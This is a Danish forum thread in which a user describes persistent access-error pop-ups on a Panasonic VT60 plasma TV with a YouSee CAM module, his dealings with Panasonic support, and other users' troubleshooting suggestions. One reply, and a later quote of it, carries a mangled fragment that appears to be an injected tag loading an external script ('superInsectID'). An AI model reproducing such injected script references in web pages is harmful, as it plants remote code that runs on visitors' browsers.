recordere.dk forum     Det danske community for hjemmets elektronik og indhold     Siden 2003
<b>Forside</b> Forside > Visnings- og lytte-udstyr > TV > Plasma TV
  Nye indlæg Nye indlæg  Seneste forum emner Seneste   Seneste forum emner (vindue) Vindue   De emner du deltager i Mine emner RSS Feed - Panasonic Plasma kompatibilitets problemer
  FAQ FAQ  Søg i forum   Opret ny bruger Opret ny bruger  Log ind Log ind

Panasonic Plasma kompatibilitets problemer

 Besvar Besvar Side  12>
Forfatter
Besked
Just23 Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 24-April-2014
Status: Offline
Point: 9
Funktioner Funktioner   Tak (0) Tak(0)   Citér Just23 Citér  BesvarSvar Direkte link til dette indlæg Emne: Panasonic Plasma kompatibilitets problemer
    Sendt: 24-April-2014 kl. 11:46

Har du en Panasonic Plasma af VT serien, skal du ikke regne med den er kompatibel med Danmarks største kabel TV udbyder – Yousee. Den kan ikke korrekt dekode sendesignalet fra Yousee, hvis man har installeret en CAM-modul med tilhørende Yousee-kort. Man vil få fejl pop-up beskeder på flere kanaler med 10 sekunders mellemrum på almindelige ikke betalingskanaler som e.g. DR-K, DR Ultra, etc.. I beskeden stor der:

Adgang til Viaccess

Besked

Du har ikke adgang til Program

Man kan kvittere med <OK>-knappen på fjernbetjeningen, men beskeden vender tilbage efter 10 sekunder. Selvom fjernsynet er certificeret til at være ”Yousee -godkendt”, er den ikke kompatibel med Yousee-signalet. Årsagen er at Panasonic har released deres fjernsyn med defekt software, som ikke er blevet gennemtestet.

Det har været en 5 mdr. lang kamp med Panasonic Danmark. Mit fjernsyn, en Panasonic Plasma TXP55VT60Y, har fejlet siden dag ét. Jeg har lavede utallige telefonopkald til Panasonic Danmarks support-site, men desværre til ingen nytte. Den eneste support de leverer, er ”Bruger Manual” support. Man bliver vejledt med alle mulige indstillinger og genskanning af kanalerne. Når det ikke lykkedes at løse problemet, sætter de straks skylden på Yousees sendesignal, CAM-modul eller kort. Jeg har skiftet CAM-modulet 3 gange og Yousee-kort 3 gange. Har kontaktet CAM-modulproducenten og fik tilsendt et alternativt modul. Men ingen af disse tiltag hjalp. Bagefter, fik jeg tilkaldt og betalt Yousee-teknikerne til at bringe deres avancerede udstyr til at måle sendesignalet og fik bekræftet, at den er fejlfri. I hele forløbet har jeg gentagne gange været i kontakt med Panasonic-support, bedt dem om at eskalere problemet op i deres system, og tilbudt at invitere deres tekniker hjem, så de kan lære noget af deres produkt, men Panasonic Danmark viste ingen interesse. Heldigvis er der en købelov i Danmark, så jeg sendte fjernsynet retur til forhandleren. Den blev sendt til reparation 2 gange, hvor hele indmaden blev skiftet ud, uden det hjalp noget. Til sidst gik det op for teknikerne, at der var noget galt med softwaren, da der begyndt at komme andre Panasonic Plasma med det samme problem. Teknikerne tog så kontakt med Panasonic, som indrømmede, at der er fejl med deres software. De har så lovede at undersøge software-fejlen, men d.d. er der ikke kommet nogen løsning.

Jeg har valgt at ophæve købet og få pengene retur. Dette er sidste gang, jeg vælger at købe et Panasonic fjernsyn på grund af denne erfaring. Indtil d.d. har jeg ikke fået nogen indrømmelser fra Panasonic Danmark i mine telefonsamtaler. Det sker kun på højt plan, når de bliver presset af forhandleren eller teknikeren. 

Fejlbesked:




Redigeret af Just23 - 24-April-2014 kl. 23:49
Til top
Bambus Se dropdown menu
Super bruger
Super bruger
Avatar

Oprettet: 21-Juni-2006
Sted: Denmark
Status: Offline
Point: 390
Funktioner Funktioner   Tak (0) Tak(0)   Citér Bambus Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-April-2014 kl. 18:09
Mærkeligt - jeg har ingen problemer med mit TX-P55VT50Y. Både cam og kort virker upåklageligt. Så det er åbenbart ikke alle i VT serien, der er problemer med.
Til top
Just23 Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 24-April-2014
Status: Offline
Point: 9
Funktioner Funktioner   Tak (0) Tak(0)   Citér Just23 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-April-2014 kl. 18:16
Har du Yousee som kabel TV udbyder? Ekstra betalingskanaler?

Redigeret af Just23 - 24-April-2014 kl. 18:20
Til top
Bambus Se dropdown menu
Super bruger
Super bruger
Avatar

Oprettet: 21-Juni-2006
Sted: Denmark
Status: Offline
Point: 390
Funktioner Funktioner   Tak (0) Tak(0)   Citér Bambus Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-April-2014 kl. 19:10
Yes til begge dele.
Til top
Roland Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 26-Maj-2009
Sted: Kbh's Vestegn
Status: Offline
Point: 1220
Funktioner Funktioner   Tak (0) Tak(0)   Citér Roland Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 20:43
Har du lige tilmeldt dig til Bland Selv ? Hvilken net id. bruger du ?
For jeg oplevede det samme med mit Pana DT60 efter jeg isatte mit Yousee kort i cam modulet. 
Årsagen skyldtes at min boligforening først aktiverer mit bland selv - 1.maj. 
Da jeg gik tilbage til net id 100 forsvandt disse irriterende popup's.
Så håber jeg, at der ikke bli'r probs efter 1. Maj - når jeg skal bruge net id 111 !

Jeg tror ikke det har noget med dit Tv at gøre, men derimod noget med YouSee at gøre.
Tjek evt. dit problem med yousee support, som kan tjekke dit kort og din opkopling på deres kabeltv.


Redigeret af Roland - 25-April-2014 kl. 20:47
Panasonic 55HZ1000 - Pioneer VSX-1025 - Wharfedale Diamond 250 - POLK Surroundbar
PC: i5-2500K 16Gb ram OCZ 120Gb SSD MSI GTX1070 - Asus PB248Q
Nighthawk X6000 - OnePlus 8T - Lenovo Tab3 -YS4000 boks
Til top
Just23 Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 24-April-2014
Status: Offline
Point: 9
Funktioner Funktioner   Tak (0) Tak(0)   Citér Just23 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 26-April-2014 kl. 01:52
Oprindeligt skrevet af Roland Roland skrev:

Har du lige tilmeldt dig til Bland Selv ? Hvilken net id. bruger du ?
For jeg oplevede det samme med mit Pana DT60 efter jeg isatte mit Yousee kort i cam modulet. 
Årsagen skyldtes at min boligforening først aktiverer mit bland selv - 1.maj. 
Da jeg gik tilbage til net id 100 forsvandt disse irriterende popup's.
Så håber jeg, at der ikke bli'r probs efter 1. Maj - når jeg skal bruge net id 111 !

Jeg tror ikke det har noget med dit Tv at gøre, men derimod noget med YouSee at gøre.
Tjek evt. dit problem med yousee support, som kan tjekke dit kort og din opkopling på deres kabeltv.

Jeg har fuldpakken og 4 ekstra kanaler. Denne sammensætning har jeg haft i flere år. Tidligere har jeg haft et fjernsyn af andet mærke, og det har fungeret upåklageligt. Det er først efter, jeg har anskaffet dette Panasonic Plasma fjernsyn, at jeg har haft problemer. Jeg har haft kontakt mange gange med Yousee Support og har fulgt og tastet alle de korrekte netværksparametre, der er gældende for min zone. Jeg har også fået tilsendt specifikke vejledninger, som Yousee har forberedt til opsætning af Panasonic fjernsyn. Da ingen af disse råd har løst problemet, sagde Yousee Support, at jeg burde skifte CAM modul. Jeg har også fået tilsendt fra Yousee ekstra kort som de sagde jeg skulle prøve. Jeg har også haft kontakt med teknisk support fra Strong, som producere CAM modulerne. Her blev jeg instrueret trin for trin over telefonen til at reset CAM-modulet for at se, om det ville hjælpe. Da det aligevel ikke hjalp, forslå de et alternativt kort, som har et lidt anderledes program. Denne CAM-modul variant fik jeg også prøvet af, men det hjalp ikke. Alt peger på, at Panasonic har releaset et fjernsyn til det danske marked, der ikke virker med Danmarks største kabel-TV-udbyder, selvom den står som Yousee "godkendt". Nogen har vist ikke lavet deres hjemmearbejde. I mine samtaler med Support fra Panasonic Danmark, over en periode på 5 mdr., har jeg jævnlig spurgt, om de kender til lignende sager, men svaret er hele tiden, at de aldrig har hørt om problemet. Man kommer ikke meget videre med Panasonic Support, og samtalen bliver ofte afsluttet med "jeg kan desværre ikke hjælp dig".




Til top
Roland Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 26-Maj-2009
Sted: Kbh's Vestegn
Status: Offline
Point: 1220
Funktioner Funktioner   Tak (0) Tak(0)   Citér Roland Citér  BesvarSvar Direkte link til dette indlæg Sendt: 26-April-2014 kl. 02:25
Det lyder jo ikke særlig godt, just23. Godt nok surt show. Disapprove
Håber ikke jeg får samme bøvl om 5-6 dages tid, når jeg får aktiveret deres "Bland Selv" med mit Strong modul og nyt YouSee kort i mit DT60.
Skal nok melde tilbage.
Panasonic 55HZ1000 - Pioneer VSX-1025 - Wharfedale Diamond 250 - POLK Surroundbar
PC: i5-2500K 16Gb ram OCZ 120Gb SSD MSI GTX1070 - Asus PB248Q
Nighthawk X6000 - OnePlus 8T - Lenovo Tab3 -YS4000 boks
Til top
cnn3 Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 20-Oktober-2004
Sted: Århus
Status: Offline
Point: 3195
Funktioner Funktioner   Tak (0) Tak(0)   Citér cnn3 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 26-April-2014 kl. 13:00
Har du prøvet at tjekke dit signal i en yousee-samsung boks med dit kort isat?< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

mvh Christian
Til top
Radiomanden Se dropdown menu
Platin medlem
Platin medlem
Avatar

Oprettet: 17-Maj-2004
Sted: 4100
Status: Offline
Point: 40543
Funktioner Funktioner   Tak (0) Tak(0)   Citér Radiomanden Citér  BesvarSvar Direkte link til dette indlæg Sendt: 26-April-2014 kl. 13:28

Der er noget om, at med bland selv så er det et andet netnummer der skal anvendes, det er 111.
Marantz NR1403 - Shield TV - Nokia 8000 Streaming boks - Samsung 40UE7005 - ARVANI TA210 SOUNDBAR - Panasonic TX-49FX623E
Til top
Bruger udmeldt 38 Se dropdown menu
--
--


Oprettet: 21-Maj-2006
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Bruger udmeldt 38 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 26-April-2014 kl. 14:04
Radiomanden: Som det allerede ér skrevet!

OP: Det som kunne være spændende ville være, at tilslutte TV'et et sted, hvor der er f.eks. STOFA. For er der ingen problemer dér, vil min påstand være, at det er et YouSee problem, og ikke et Panasonic problem!!

M.v.h.
Til top
Just23 Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 24-April-2014
Status: Offline
Point: 9
Funktioner Funktioner   Tak (0) Tak(0)   Citér Just23 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 27-April-2014 kl. 12:48
Oprindeligt skrevet af cnn3 cnn3 skrev:

Har du prøvet at tjekke dit signal i en yousee-samsung boks med dit kort isat?< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">


Det har jeg ikke. Jeg vil aldrig acceptere, at et nyt TV skal have en separat boks til tuning af kanaler.

Til top
Just23 Se dropdown menu
Ny bruger
Ny bruger


Oprettet: 24-April-2014
Status: Offline
Point: 9
Funktioner Funktioner   Tak (0) Tak(0)   Citér Just23 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 27-April-2014 kl. 12:51
Oprindeligt skrevet af Henrik B. Henrik B. skrev:

Radiomanden: Som det allerede ér skrevet!

OP: Det som kunne være spændende ville være, at tilslutte TV'et et sted, hvor der er f.eks. STOFA. For er der ingen problemer dér, vil min påstand være, at det er et YouSee problem, og ikke et Panasonic problem!!

M.v.h.

Jeg har prøvede at tilslutte et 2 år gammelt Samsung fjernsyn på samme signal. Der kommer ingen fejlbeskeder og det virker fint.
Til top
 
 Besvar Besvar Side  12>
 
Skift forum Forum-tilladelser Se dropdown menu